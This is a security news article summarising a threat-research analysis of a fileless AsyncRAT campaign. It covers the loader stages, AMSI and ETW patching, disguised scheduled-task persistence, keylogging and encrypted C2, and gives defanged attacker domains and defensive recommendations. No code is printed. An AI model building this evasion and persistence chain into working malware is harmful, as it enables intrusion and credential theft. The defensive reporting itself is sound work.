AsyncRAT Leverages Fileless Techniques to Bypass Detection

Fileless malware has become a formidable adversary for security teams, operating entirely in memory and evading disk-based detection.

A recent incident demonstrates how attackers leveraged a multi-stage fileless loader to deploy AsyncRAT, a powerful Remote Access Trojan (RAT), through legitimate system tools—leaving almost no footprint on disk.

This case study highlights critical techniques for persistence, evasion, and control, underscoring the urgent need for advanced behavioral monitoring and memory-forensic capabilities.

The intrusion began when a valid but compromised ScreenConnect client provided interactive access to the attacker.

By connecting through the malicious domain relay.shipperzone[.]online, the threat actor gained remote control over the target endpoint.

Once inside, they executed a VBScript (Update.vbs) using WScript, which immediately initiated a PowerShell command to fetch two additional payloads—logs.ldk and logs.ldr—from a remote server.

Both files were silently written to the C:UsersPublic directory, but instead of executing them from disk, the script converted logs.ldk into a byte array and loaded logs.ldr directly into memory via reflection.

The script then retrieved encoded data over HTTP, decoded it on the fly, and dynamically invoked methods in a .NET assembly.

This fileless approach meant no executables were visible on disk, enabling the adversary to completely bypass signature‐based antivirus tools.

Stage 1: Obfuscator.dll – In-Memory

Once the first-stage payload was resident in memory, it loaded Obfuscator.dll, a .NET assembly analyzed by the LevelBlue threat researchers using dnSpy.

Obfuscator.dll serves as the in-memory launcher, orchestrating persistence and defense evasion:

• Entry Class: Initializes the CLR environment without writing files to disk.
• Core Class: Establishes persistence by creating a scheduled task disguised as “Skype Updater,” ensuring the assembly reloads after system reboot.
• Tafce5 Class: Contains anti-analysis routines:
  • PatchAMSI() and PatchETW() disable Windows security event logging and script scanning.
  • Dynamic API resolution via GetProcAddress() and GetModuleHandle() thwarts static import‐table inspections.

This modular design allows the loader to silence critical defenses, maintain stealth, and prepare the environment for the main RAT payload.

Stage 2: AsyncClient.exe

With defenses neutralized, the loader fetched and decrypted AsyncClient.exe, the RAT’s operational core. AsyncClient.exe employs advanced encryption and a custom communication protocol to maintain long-term access:

• Configuration Decryption: Embedded Base64 settings are decrypted with AES-256, revealing C2 endpoints (3osch20[.]duckdns[.]org), persistence flags, target directories (%AppData%), and a unique hardware ID.
• C2 Communication: A TCP socket maintains a heartbeat using 4-byte length-prefixed MessagePack packets, enabling stealthy command dispatch and data exfiltration.
• Reconnaissance: The RAT gathers OS details, privilege levels, antivirus status, active window titles, and browser extensions such as MetaMask and Phantom to map out high-value targets.
• Exfiltration and Keylogging: Captured data—including clipboard contents, credentials, and keystrokes—is encrypted and stored temporarily before being sent to the C2. A Windows hook callback records user input, augmenting the RAT’s reconnaissance capability.

Persistence is reinforced by recreating scheduled tasks using functions originally found in Obfuscator.dll, ensuring that even if one mechanism fails, a backup remains active.

Defensive Measures

This incident underscores how fileless loaders can weaponize legitimate administration tools to defeat traditional defenses. To counter such threats, organizations should:

• Deploy memory-forensic monitoring to detect anomalous code injection and reflection-based assembly loads.
• Enable behavioral analytics on scripting hosts (PowerShell, WScript) to flag unusual remote payload retrievals.
• Harden endpoint configurations by restricting the creation of scheduled tasks and monitoring task scheduler logs.
• Maintain strict whitelisting policies for remote administration tools such as ScreenConnect, and enforce multi-factor authentication to prevent unauthorized use.

For a complete breakdown of the IOCs, full decompiled code snippets, and recommended YARA rules, download the full report here.

This in-depth analysis equips defenders with the intelligence needed to craft targeted detection signatures, enhance incident response playbooks, and fortify memory-based defenses against evolving fileless malware campaigns.

Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates.